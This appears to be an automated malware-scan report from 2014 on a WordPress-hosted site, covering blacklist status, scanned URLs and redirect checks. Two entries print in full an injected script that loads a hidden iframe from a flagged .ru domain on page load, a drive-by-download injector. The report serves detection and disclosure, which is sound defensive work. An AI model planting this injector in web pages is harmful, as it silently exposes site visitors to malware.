Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tbonefixer.onletterhead.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://tbonefixer.onletterhead.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://tbonefixer.onletterhead.com/ | HTTP/1.1 200 OK Date: Wed, 24 Sep 2014 09:02:29 GMT Accept-Ranges: bytes ETag: "ae728d1a145ce1:0" Server: Microsoft-IIS/7.5 Content-Length: 1728 Content-Type: text/html Last-Modified: Tue, 30 Apr 2013 12:54:14 GMT X-Powered-By: ASP.NET | clean |
http://onletterhead.com/ | 200 OK Content-Length: 18664 Content-Type: text/html | clean |
http://onletterhead.com//ajax.googleapis.com/ajax/libs/jquery/1.8.0/jquery.min.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Wed, 24 Sep 2014 09:03:33 GMT Pragma: no-cache Location: http://onletterhead.com/ajax.googleapis.com/ajax/libs/jquery/1.8.0/jquery.min.js/ Server: Apache/2.2.15 Vary: Cookie Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Pingback: http://onletterhead.com/xmlrpc.php X-Powered-By: PHP/5.3.3 | clean |
http://onletterhead.com/ajax.googleapis.com/ajax/libs/jquery/1.8.0/jquery.min.js/ | 404 Not Found Content-Length: 851 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: rabiorik.ru function create_frame(a){var b=document.getElementById('i71tp6u');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="i71tp6u";c.style.width="0px";c.style.height="0px";c.style.border="0px";c.frameBorder="0";c.style.display="none";c.setAttribute("frameBorder","0");document.body.appendChild(c);c.src=a;return true}}function enkiqmp(){create_frame("http://rabiorik.ru/dqxhamf.cgi?default")}try{if(window.attachEvent){window.attachEvent('onload',enkiqmp)}else{if(window.onload){var curronload=window.onload;var newonload=function(){curronload();enkiqmp()};window.onload=newonload}else{window.onload=enkiqmp}}}catch(err){} Decoded script: function enkiqmp() { create_frame("http://rabiorik.ru/dqxhamf.cgi?default"); } | ||
http://onletterhead.com/test404page.js | 404 Not Found Content-Length: 843 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: rabiorik.ru function create_frame(a){var b=document.getElementById('o4o');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="o4o";c.style.width="0px";c.style.height="0px";c.style.border="0px";c.frameBorder="0";c.style.display="none";c.setAttribute("frameBorder","0");document.body.appendChild(c);c.src=a;return true}}function w45xw32(){create_frame("http://rabiorik.ru/siobsuy.cgi?default")}try{if(window.attachEvent){window.attachEvent('onload',w45xw32)}else{if(window.onload){var curronload=window.onload;var newonload=function(){curronload();w45xw32()};window.onload=newonload}else{window.onload=w45xw32}}}catch(err){} Decoded script: function w45xw32() { create_frame("http://rabiorik.ru/siobsuy.cgi?default"); } | ||
http://tbonefixer.onletterhead.com//use.typekit.net/kwy8orz.js/ | 404 Not Found Content-Length: 1245 Content-Type: text/html | clean |
http://tbonefixer.onletterhead.com/wp-content/themes/toolbox/js/olh.js | 404 Not Found Content-Length: 1245 Content-Type: text/html | clean |
http://tbonefixer.onletterhead.com/wp-content/themes/toolbox/js/jquery.showhide.js | 404 Not Found Content-Length: 1245 Content-Type: text/html | clean |
http://tbonefixer.onletterhead.com/wp-content/themes/toolbox/js/jquery.localscroll.js | 404 Not Found Content-Length: 1245 Content-Type: text/html | clean |
http://tbonefixer.onletterhead.com/wp-content/themes/toolbox/js/jquery.scrollto.js | 404 Not Found Content-Length: 1245 Content-Type: text/html | clean |
http://tbonefixer.onletterhead.com/wp-content/themes/toolbox/js/jquery.plusslider.js | 404 Not Found Content-Length: 1245 Content-Type: text/html | clean |
http://onletterhead.com/wp-includes/js/jquery/jquery.js?ver=1.11.0 | 200 OK Content-Length: 96407 Content-Type: text/javascript | clean |
http://onletterhead.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7201 Content-Type: text/javascript | clean |
http://onletterhead.com/wp-content/plugins/gravity-forms-placeholders/gf.placeholders.js?ver=1.0 | 200 OK Content-Length: 1272 Content-Type: text/javascript | clean |
http://onletterhead.com/wp-includes/js/comment-reply.min.js?ver=3.9.2 | 200 OK Content-Length: 757 Content-Type: text/javascript | clean |
http://onletterhead.com/wp-content/plugins/lightbox-plus/js/jquery.colorbox.1.3.32.js?ver=1.3.32 | 200 OK Content-Length: 27004 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: tbonefixer.onletterhead.com
Result:
HTTP/1.1 200 OK
Date: Wed, 24 Sep 2014 09:02:29 GMT
Accept-Ranges: bytes
ETag: "ae728d1a145ce1:0"
Server: Microsoft-IIS/7.5
Content-Length: 1728
Content-Type: text/html
Last-Modified: Tue, 30 Apr 2013 12:54:14 GMT
X-Powered-By: ASP.NET
...1728 bytes of data.
GET / HTTP/1.1
Host: tbonefixer.onletterhead.com
Result:
HTTP/1.1 200 OK
Date: Wed, 24 Sep 2014 09:02:29 GMT
Accept-Ranges: bytes
ETag: "ae728d1a145ce1:0"
Server: Microsoft-IIS/7.5
Content-Length: 1728
Content-Type: text/html
Last-Modified: Tue, 30 Apr 2013 12:54:14 GMT
X-Powered-By: ASP.NET
...1728 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: tbonefixer.onletterhead.com
Referer: http://www.google.com/search?q=tbonefixer.onletterhead.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: tbonefixer.onletterhead.com
Referer: http://www.google.com/search?q=tbonefixer.onletterhead.com
Result:
The result is similar to the first query. There are no suspicious redirects found.